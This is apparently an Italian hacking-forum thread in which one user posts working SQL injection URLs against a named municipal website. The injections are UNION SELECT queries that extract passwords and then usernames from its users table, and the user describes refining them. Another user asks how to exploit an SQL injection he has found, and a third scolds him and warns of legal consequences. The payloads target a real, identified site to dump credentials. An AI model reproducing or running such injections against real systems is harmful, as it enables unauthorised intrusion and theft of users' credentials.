comune.gaeta.it SQL Injection

Stato
Discussione chiusa ad ulteriori risposte.

G4rr3tt

Utente Silver
23 Agosto 2009
1
0
0
56
Codice:
 http://www.comune.gaeta.lt.it/comune/calendario.asp?flag=0&news=251+UNION+SELECT+1,password,3,4,5,6,7,8+FROM+users

Il sito è di un paese quasi confinante col mio.
Non sono riuscito a scovare la colonna degli username, questa è una delle mie prime SQL injection quindi siate pazienti :punkmg::rockomg:
 
ragazzi ho trovato una vulnerabilità sql injection su un sito , come la devo sfruttare ? come faccio a t5rovare le tabelle ?
 
Campo trovato:
Codice:
http://www.comune.gaeta.lt.it/comune/calendario.asp?flag=0&news=251+UNION+SELECT+1,password,username,4,5,6,7,8+FROM+users
 
Luke34 ha detto:
ragazzi ho trovato una vulnerabilità sql injection su un sito , come la devo sfruttare ? come faccio a t5rovare le tabelle ?

Allora.. Allora.. Cercando di stare calmi.. Caro, la gente si fa il CULO.. Per imparare.. La gente STUDIA.. Tramite google.. Si fa le ricerche.. Ci sta dietro giorni.. Mesi.. A volte ANNI.. Tu nn puoi pretendere di arrivare qui, su un Forum di WHITE HAT e chiedere solo cm si buca un sito, pensando che sia una cazzata che la si impara in 2 o 3 ore. Da quanto vedo, nn c'hai un pazzo di esperienza e vuoi già passare alle SQL Injection. Studiati prima le XSS, così per farti un'idea che è INUTILE perdere tempo solo per rubare una password di MSN.. Per rubare una fottutissima password, devi studiare le tecniche, imparare e farti un mazzo ESOSO, perché INSEGNANTI NN ESISTONO. Guardati i video tutorial piuttosto. Io nn ho chiesto un pazzo a nessuno, perché SO che la gente dice di NO alle domande che fai a loro.. Per gli stessi motivi che ti ho appena elencato. Quindi, sai cm ho fatto io? Google. Ho fatto qualche ricerca, ho letto GUIDE SU GUIDE e ho imparato. Erano tutte sbagliate, ma leggendole tutte impari correttamente. SE IO CE L'HO FATTA.. Un ragazzo normale, di 19 anni.. Ce la puoi fare pure te. È solo questione di APPLICARSI e di PASSIONE. Tu, quest'ultima, nn ce l'hai.. Si vede chiaro e tondo che vuoi fare il bullo virtuale, nn sapendo un pazzo delle leggi italiane contro noi curiosoni.. Quando poi hai problemi legali, ti metterai a piangere. Dante

@Tutti: Butei, chiamate BlackLight e fategli leggere questo Topic, per una volta sarei della sua stessa opinione. Dante
 
Stato
Discussione chiusa ad ulteriori risposte.